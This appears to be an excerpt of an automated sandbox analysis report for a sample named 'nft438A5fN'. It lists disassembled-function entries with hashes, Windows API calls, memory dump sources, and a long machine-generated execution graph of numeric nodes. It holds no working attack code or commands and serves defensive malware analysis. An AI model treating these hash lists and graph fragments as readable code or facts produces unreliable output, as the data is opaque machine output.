                                                                      Similarity
                                                                      • API ID: _memcmp_wcslen
                                                                      • String ID: ?
                                                                      • API String ID: 1846113162-1684325040
                                                                      • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                      • Instruction ID: 974250d21c6eacd87eb974b3ab5b76ebb0cae9a93814c9403679be573691bb23
                                                                      • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                      • Instruction Fuzzy Hash: 8B4192B1504356AFDB61DF60DD48AABB7ECEB84745F00096AF545C2261EB70CD48CBD2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 8SG$@ouu
                                                                      • API String ID: 176396367-2912095163
                                                                      • Opcode ID: bba1c72303a92f5c67287bcd5b8cf3608eb88736a3519e3ce1e560bda5bf68a7
                                                                      • Instruction ID: d02ce216a007445eb05132ee76c5a611afd025e6ed55a2e76e8ed16dc7d79b7e
                                                                      • Opcode Fuzzy Hash: bba1c72303a92f5c67287bcd5b8cf3608eb88736a3519e3ce1e560bda5bf68a7
                                                                      • Instruction Fuzzy Hash: 4721B662B002147BDF04BAB4ECA5EFD366FCF94324F10047EE406A7381EE299D098A75
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strftime
                                                                      • String ID: dMG$|MG
                                                                      • API String ID: 1867682108-1683252805
                                                                      • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                                      • Instruction ID: 2e09bdc2aa9b399c81c15aeb76c37196890e15f0872e76c150048ce0005a5ea9
                                                                      • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                                      • Instruction Fuzzy Hash: F8318471504301AFD724EB60FD61AEE77A6EB94310F004439E149826E0EF749E49CF6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6c0ba1e004557d540f487a1608ea8381c058648c682f50c094c3f584b10274e6
                                                                      • Instruction ID: 6ad0cf25923a21d43f8048ae9886d2e46321208ad148804fc62670a54334899a
                                                                      • Opcode Fuzzy Hash: 6c0ba1e004557d540f487a1608ea8381c058648c682f50c094c3f584b10274e6
                                                                      • Instruction Fuzzy Hash: F1A1F7777106060BDF19AA7C9C8E3ADB3C69BC4325F1C427ED11DCB381DBE58A429690
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C995DA), ref: 02C99572
                                                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C995DA), ref: 02C99578
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DateFormatLocaleThread
                                                                      • String ID: yyyy
                                                                      • API String ID: 3303714858-3145165042
                                                                      • Opcode ID: 3724ac29d5bfa20cba3f077bfff0a347cea8c2a68d2113f40373991ffa85f714
                                                                      • Instruction ID: 13291fc926fe9a68916a2f16fed1299891b5bb9110ee2c9be81102a77f72bccc
                                                                      • Opcode Fuzzy Hash: 3724ac29d5bfa20cba3f077bfff0a347cea8c2a68d2113f40373991ffa85f714
                                                                      • Instruction Fuzzy Hash: CA219271A002589FDF24DFA8C889AAFB3B9EF49700F5101AAE805E7250E730DF40DB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: o~E$NG
                                                                      • API String ID: 3519838083-4065726910
                                                                      • Opcode ID: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                      • Instruction ID: c5d79fa9b541b98973b5592765814d7c6392a6cf553544d9b7ffb5e674ad315a
                                                                      • Opcode Fuzzy Hash: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                      • Instruction Fuzzy Hash: 60216772D001086BDB14F7A4F865AFE7776EF94320F20416AE516A3690DF341E05CF65
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA83C2), ref: 02CA83A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                      • API String ID: 3811539418-184458249
                                                                      • Opcode ID: 3ef4df6b5a3b8705fb92a97d428924a9f827c4d72874e78334f03519d58b8567
                                                                      • Instruction ID: 2cc7d1384b98158b4d8563b32e7641cf35726f588620e36a80eed9aa1a420cc1
                                                                      • Opcode Fuzzy Hash: 3ef4df6b5a3b8705fb92a97d428924a9f827c4d72874e78334f03519d58b8567
                                                                      • Instruction Fuzzy Hash: 5A0169B1780309BFEB14EFA4DC61F5AB7EEEB09B04F518460B909D6B50D670AD119A24
                                                                      APIs
                                                                        • Part of subcall function 02D4BD91: __onexit.LIBCMT ref: 02D4BD97
                                                                      • __Init_thread_footer.LIBCMT ref: 02D284F4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Init_thread_footer__onexit
                                                                      • String ID: ,kG$0kG
                                                                      • API String ID: 1881088180-2015055088
                                                                      • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                      • Instruction ID: 96b7f4d86d20d67e1deb0c4cfa771c5f289b170bb75025ccb16b5d711e79a9c8
                                                                      • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                      • Instruction Fuzzy Hash: 47E0D8315009308FC104A328D540A4537D7DB2A728F11802BD408D73D0CF1AAC46CD7D
                                                                      APIs
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAF58
                                                                      • IsBadWritePtr.KERNEL32(?,00000004), ref: 02CAAF88
                                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02CAAFA7
                                                                      • IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAFB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Read$Write
                                                                      • String ID:
                                                                      • API String ID: 3448952669-0
                                                                      • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                      • Instruction ID: 4271b08f626c575bd2f13c5acec2e174baf01efeb776c280ab5252d4dd0d663b
                                                                      • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                      • Instruction Fuzzy Hash: 3921B4B264061A9FDF14DF69CC80BAE73B9EF80359F104512FE1497380D739E911CAA4

                                                                      Execution Graph

                                                                      Execution Coverage:3.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0.5%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:11
20801->20771 20803 4f1ba 20802->20803 20803->20783 20805 4f1c8 ??_V@YAXPAX 20803->20805 20805->20783 20806->20771 20808->20771 20808->20804 20809->20771 20811 4dcd0 448 API calls 20810->20811 20814 4bfc8 20811->20814 20812 5cfad longjmp 20817 4c02c 20812->20817 20813 5cfc1 longjmp 20813->20817 20815 4dcd0 448 API calls 20814->20815 20814->20817 20819 4c155 20814->20819 20815->20817 20816 4ec2e 448 API calls 20816->20817 20817->20812 20817->20813 20817->20816 20818 4c0bf 20817->20818 20817->20819 20821 4c111 20817->20821 20822 4c1ef wcstol 20817->20822 20830 4c26d 20817->20830 20859 4c3f4 20818->20859 20819->20818 20819->20819 20825 5d042 memcpy 20819->20825 20826 4c333 memcpy 20819->20826 20829 4c1b2 _wcsnicmp 20819->20829 20821->20819 20824 5d029 20821->20824 20822->20817 20827 478e4 448 API calls 20824->20827 20828 5d063 20825->20828 20826->20829 20831 5d036 longjmp 20827->20831 20829->20819 20830->20819 20832 4c27d wcstol 20830->20832 20831->20825 20832->20819 20834 51da8 20833->20834 20844 51e5a 20833->20844 20834->20844 20854 4ab7f 20834->20854 20837 4acb0 448 API calls 20838 51dc2 20837->20838 20839 501f5 wcsrchr 20838->20839 20845 51dd1 20839->20845 20840 5f106 20841 51e4a 20843 4dc60 2 API calls 20841->20843 20842 51e11 _wcsnicmp 20842->20845 20843->20844 20844->20792 20845->20840 20845->20841 20845->20842 20845->20845 20849 6b35b __aulldvrm 20846->20849 20847 6b42e 20848 6b445 wcsncmp 20847->20848 20851 6b432 20847->20851 20848->20851 20849->20847 20850 6b3f4 memmove 20849->20850 20850->20849 20852 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20851->20852 20853 6b4f8 20852->20853 20853->20771 20855 4abaa 20854->20855 20858 4ab88 20854->20858 20855->20837 20856 4ab89 iswspace 20857 4ab98 wcschr 20856->20857 20856->20858 20857->20855 20857->20858 20858->20855 20858->20856 20858->20857 20860 4dc60 2 API calls 20859->20860 20861 4c3fb 20860->20861 20862 4dc60 2 API calls 20861->20862 20863 4c0df 20862->20863 20863->20707 20865 
67679 20864->20865 20866 67660 20864->20866 20865->20715 20865->20728 20865->20740 20867 56e25 4 API calls 20866->20867 20867->20865 20868->20740 20870 68727 20869->20870 20875 68781 20869->20875 20871 4998d 448 API calls 20870->20871 20873 68736 20871->20873 20872 49950 448 API calls 20872->20873 20873->20872 20874 4998d 448 API calls 20873->20874 20873->20875 20874->20873 20877 49950 448 API calls 20876->20877 20878 686f9 20877->20878 20879 6871d 448 API calls 20878->20879 20880 68702 20879->20880 20881 68791 448 API calls 20880->20881 20882 6870d 20881->20882 20883 68791 448 API calls 20882->20883 20884 68718 20883->20884 20884->20291 20886 4adc6 20885->20886 20887 5cc3f 20885->20887 20888 55a2e memset 20886->20888 20889 5cc6a GetLastError 20887->20889 20892 478e4 448 API calls 20887->20892 20896 561e6 ??_V@YAXPAX 20887->20896 20890 4add1 20888->20890 20889->20887 20890->20887 20891 4e3f0 17 API calls 20890->20891 20893 4adef 20891->20893 20892->20887 20893->20887 20894 4ae05 20893->20894 20895 4b0b9 20893->20895 21136 4e950 memset 20894->21136 20898 50b12 5 API calls 20895->20898 20896->20887 20900 4b0c1 20898->20900 20900->20887 21265 47f47 memset 20900->21265 20901 4ae23 20901->20887 20906 5cc7c 20901->20906 20911 4ae44 20901->20911 20902 4b118 21279 521ee 20902->21279 20905 4b11f 21283 52940 20905->21283 20908 561e6 ??_V@YAXPAX 20906->20908 20927 4aea1 20908->20927 20909 4b0dc towupper 20910 4b100 20909->20910 20910->20902 20910->20910 20914 5cc75 20910->20914 20913 4bc30 448 API calls 20911->20913 20911->20927 20916 4ae86 20913->20916 20917 69a7d 448 API calls 20914->20917 20915 4afc2 21193 4b17b 20915->21193 20918 4ae91 20916->20918 20920 4b00e wcsncmp 20916->20920 20917->20906 20922 4a800 449 API calls 20918->20922 20918->20927 20920->20918 20920->20927 20922->20927 20923 4af6b 21165 4b1b0 20923->21165 20924 561e6 ??_V@YAXPAX 20926 4afe8 20924->20926 20929 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20926->20929 
20927->20887 20927->20923 20927->20927 20931 4aecb wcschr 20927->20931 20940 4b13b 20927->20940 20941 4b176 20927->20941 20933 4b002 20929->20933 20930 50b12 5 API calls 20930->20940 20931->20927 20950 4b033 20931->20950 20932 4af83 20934 4afc4 20932->20934 20935 4af99 20932->20935 20933->18657 21187 4aa50 20934->21187 20937 4afa5 20935->20937 20938 4b02c 20935->20938 20942 4afb1 20937->20942 20943 4b085 20937->20943 21197 4c6c0 20938->21197 20940->20927 20940->20930 20940->20941 20951 47f47 23 API calls 20940->20951 20955 5ccc9 GetLastError 20940->20955 20945 478e4 448 API calls 20941->20945 20947 4b0a2 20942->20947 20948 4afbd 20942->20948 21250 49dc0 20943->21250 20945->20887 20947->20905 20952 4b0aa 20947->20952 21184 49770 20948->21184 20949 4b031 20949->20915 20950->20943 20954 4b193 20950->20954 20951->20940 21169 459a0 20952->21169 20956 56c78 4 API calls 20954->20956 20955->20941 20956->20941 20959 4e683 20958->20959 20971 4e6c6 20958->20971 20960 4e689 20959->20960 20962 4e71d 20959->20962 20968 4e733 20959->20968 20969 4e6ec 20959->20969 20959->20971 22131 4e790 20960->22131 20967 4e790 457 API calls 20962->20967 20964 4e790 457 API calls 20970 4e6ad 20964->20970 20965 4e790 457 API calls 20965->20971 20966 4e790 457 API calls 20966->20969 20967->20968 20968->20965 20968->20971 20969->20966 20969->20971 20970->20971 20972 4e790 457 API calls 20970->20972 20971->18626 20972->20970 20975 503cb 20973->20975 20974 503e1 20976 50416 20974->20976 20977 503f3 20974->20977 20975->20974 20978 5e7bf iswdigit 20975->20978 20981 503f8 20976->20981 22149 52960 wcstol wcstol 20976->22149 22145 515f0 20977->22145 20978->20975 20980 5e7e2 20978->20980 20983 478e4 448 API calls 20980->20983 20985 4e470 917 API calls 20981->20985 20984 5040d 20983->20984 20984->18657 20985->20984 20987 4e470 918 API calls 20986->20987 20988 4ab63 20987->20988 20989 4ab76 20988->20989 20990 4e470 918 API calls 20988->20990 20989->18657 20990->20989 20992 4e3f0 17 API calls 20991->20992 
20993 49f61 20992->20993 21000 50060 5 API calls 20993->21000 21007 49fd7 20993->21007 21019 4a0d9 20993->21019 20994 4a0e7 ??_V@YAXPAX 20995 4a0ef 20994->20995 20996 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20995->20996 20998 4a0fe 20996->20998 20997 49ff4 21002 5c376 _get_osfhandle SetFilePointer 20997->21002 21005 4a02b _get_osfhandle 20997->21005 21010 5c439 20997->21010 21011 4a16c _close 20997->21011 21013 4dd98 6 API calls 20997->21013 21016 4a1d6 _dup2 20997->21016 21017 5c3d3 20997->21017 20997->21019 21020 50590 19 API calls 20997->21020 21022 5c40c 20997->21022 21024 4a11c 20997->21024 21026 5c4aa 20997->21026 22154 4a1a8 _dup 20997->22154 22156 69fcf _get_osfhandle GetFileType 20997->22156 20998->18632 20998->18644 20999 4dcd0 448 API calls 20999->20997 21000->20993 21002->20997 21003 5c392 21002->21003 21006 49abf _vsnwprintf 21003->21006 21005->20997 21008 4a03d _get_osfhandle 21005->21008 21009 5c3a9 21006->21009 21007->20997 21007->20999 21008->20997 21014 478e4 448 API calls 21009->21014 21012 49abf _vsnwprintf 21010->21012 21011->20997 21012->21009 21013->20997 21015 5c463 21014->21015 21018 4a125 2 API calls 21015->21018 21016->20997 21021 51d90 451 API calls 21017->21021 21018->21019 21019->20994 21019->20995 21020->20997 21025 5c3dd 21021->21025 21023 4a1d6 _dup2 21022->21023 21027 5c42d 21023->21027 21029 4a125 2 API calls 21024->21029 21025->21026 21032 5c3f2 SearchPathW 21025->21032 21028 4a125 2 API calls 21026->21028 21030 5c475 21027->21030 21031 5c434 21027->21031 21033 5c4af 21028->21033 21035 5c47f 21029->21035 21034 4a16c _close 21030->21034 21036 4a16c _close 21031->21036 21032->21022 21032->21026 21037 69edb 448 API calls 21033->21037 21034->21024 21038 49abf _vsnwprintf 21035->21038 21036->21010 21037->21019 21039 5c496 21038->21039 21040 478e4 448 API calls 21039->21040 21040->21019 21042 4e470 918 API calls 21041->21042 21043 503a2 21042->21043 21043->18657 21045 4dcd0 448 API calls 
21044->21045 21046 50776 21045->21046 21047 5e9b9 21046->21047 21048 50792 21046->21048 21049 5089d 21046->21049 21052 4dd20 448 API calls 21048->21052 21050 4dcd0 448 API calls 21049->21050 21051 508a5 21050->21051 21053 4dcd0 448 API calls 21051->21053 21054 507b3 21052->21054 21060 507de 21053->21060 21055 5e8bd 21054->21055 21056 507bb 21054->21056 21058 4dc60 2 API calls 21055->21058 21057 4dd20 448 API calls 21056->21057 21059 507d6 21057->21059 21058->21059 21059->21060 21063 4dc60 2 API calls 21059->21063 21060->21047 21061 508c5 21060->21061 21062 50812 21060->21062 21064 4bc30 448 API calls 21061->21064 21065 50875 21062->21065 21066 50818 21062->21066 21063->21060 21067 508d2 wcstol 21064->21067 21068 5e8e7 21065->21068 21069 5087f 21065->21069 22157 50bf0 21066->22157 22272 4a7d5 21067->22272 21075 50060 5 API calls 21068->21075 21072 4bc30 448 API calls 21069->21072 21074 5088c 21072->21074 21073 508ec wcstol 21076 4a7d5 21073->21076 22221 46e57 21074->22221 21078 5e8fd GetFullPathNameW 21075->21078 21079 50906 wcstol 21076->21079 21084 5e915 21078->21084 21094 50922 21079->21094 21080 50822 21080->21047 21080->21080 21081 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21080->21081 21083 50871 21081->21083 21082 4dcd0 448 API calls 21082->21084 21083->18657 21084->21082 21085 478e4 448 API calls 21084->21085 21086 5e942 GetFullPathNameW 21084->21086 21090 5e95d 21084->21090 21085->21084 21086->21084 21087 698b5 453 API calls 21087->21094 21088 49abf _vsnwprintf 21088->21094 21089 4bc30 448 API calls 21091 5e99d 21089->21091 21090->21089 22283 63e66 21091->22283 21094->21068 21094->21087 21094->21088 21095 5198f 3 API calls 21094->21095 22274 50bbb 21094->22274 21095->21094 21097 4e5d8 21096->21097 21099 4eda4 21096->21099 21097->18648 21097->18658 21098 4edb7 _wcsicmp 21098->21097 21098->21099 21099->21097 21099->21098 21101 52090 21100->21101 21102 4dcd0 448 API calls 21101->21102 21103 520a9 21102->21103 21104 4b1b0 448 
API calls 21103->21104 21129 4e613 21103->21129 21105 520ba 21104->21105 21106 4f410 464 API calls 21105->21106 21105->21129 21107 520d2 21106->21107 21108 5212f 21107->21108 21109 520d9 GetConsoleTitleW 21107->21109 21111 52134 GetConsoleTitleW 21108->21111 21112 5217a 21108->21112 21110 4ad26 450 API calls 21109->21110 21115 520f2 21110->21115 21116 4ad26 450 API calls 21111->21116 21113 52183 21112->21113 21114 5f23f 21112->21114 21120 5f24d 21113->21120 21121 5219f 21113->21121 21113->21129 21118 48bc7 448 API calls 21114->21118 22337 49458 21115->22337 21119 5214d 21116->21119 21118->21129 21123 51a47 916 API calls 21119->21123 21126 478e4 448 API calls 21120->21126 21124 478e4 448 API calls 21121->21124 21122 52107 22396 521b5 21122->22396 21127 52164 21123->21127 21124->21129 21126->21129 22399 521c1 21127->22399 21129->18657 21131 55807 21130->21131 21135 55833 21130->21135 21132 55813 _setjmp3 21131->21132 21133 55825 21132->21133 21132->21135 22500 556c4 21133->22500 21135->18655 21137 4e9b2 21136->21137 21146 4ea65 21136->21146 21138 4e3f0 17 API calls 21137->21138 21141 4e9c3 21138->21141 21139 4ea3d 21143 4ebf0 GetFileAttributesW 21139->21143 21144 4ec1e 21139->21144 21139->21146 21140 4e9f6 wcschr 21140->21139 21140->21141 21141->21139 21141->21140 21142 4ea0e wcschr 21141->21142 21141->21146 21160 4eb41 21141->21160 21142->21141 21145 4ebfc 21143->21145 21144->21143 21145->21146 21147 4ea7e _wcsicmp 21146->21147 21155 4ea99 21146->21155 21147->21146 21148 4eb7e iswspace 21149 4eac3 21148->21149 21148->21160 21150 5dd3f 21149->21150 21151 4eaf7 21149->21151 21158 4dcd0 448 API calls 21150->21158 21153 4eb05 ??_V@YAXPAX 21151->21153 21154 4eb0f 21151->21154 21152 4a62f wcschr 21152->21160 21153->21154 21156 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21154->21156 21155->21149 21155->21150 21157 4ed90 _wcsicmp 21155->21157 21159 4ae12 21156->21159 21157->21160 21161 5dd80 21158->21161 21159->20901 21159->20902 
21160->21148 21160->21149 21160->21150 21160->21152 21162 69922 448 API calls 21161->21162 21164 5dd9e 21161->21164 21163 5dd91 longjmp 21162->21163 21163->21164 21166 4b1c9 21165->21166 21167 4dcd0 448 API calls 21166->21167 21168 4af78 21167->21168 21168->20932 21172 4ad26 21168->21172 21286 45ea3 memset 21169->21286 21173 4ad40 21172->21173 21174 4ad37 21172->21174 21173->20932 21174->21173 21175 4dcd0 448 API calls 21174->21175 21176 5cb7b 21175->21176 21176->21173 21177 5cb85 GetConsoleTitleW 21176->21177 21177->21173 21178 5cb9b 21177->21178 21179 4dd20 448 API calls 21178->21179 21183 5cbcd 21179->21183 21180 5cc33 21181 4dc60 2 API calls 21180->21181 21181->21173 21182 5cc2c SetConsoleTitleW 21182->21180 21183->21180 21183->21182 21352 49cc0 21184->21352 21188 4aa66 21187->21188 21189 5c9eb 21187->21189 21559 4aa75 21188->21559 21191 4aa75 489 API calls 21189->21191 21192 4aa6b 21191->21192 21192->20915 21194 4afdd 21193->21194 21195 4b185 21193->21195 21194->20924 21195->21194 21196 5ccfa SetConsoleTitleW 21195->21196 21196->21194 21198 4c709 21197->21198 21215 4c7ae 21197->21215 21198->21215 21739 4b3c1 21198->21739 21199 51cb1 450 API calls 21199->21215 21202 698b5 453 API calls 21202->21215 21203 478e4 448 API calls 21203->21215 21204 4e272 453 API calls 21205 4c732 21204->21205 21205->21215 21207 64191 448 API calls 21207->21215 21212 4c8b3 _get_osfhandle SetFilePointer 21212->21215 21216 4c8da _get_osfhandle GetFileType 21212->21216 21214 4c799 21220 4a16c _close 21214->21220 21215->21199 21215->21202 21215->21203 21215->21207 21215->21212 21215->21214 21215->21216 21218 4caa2 21215->21218 21219 5d162 memcmp 21215->21219 21228 56c78 4 API calls 21215->21228 21229 4c808 MultiByteToWideChar 21215->21229 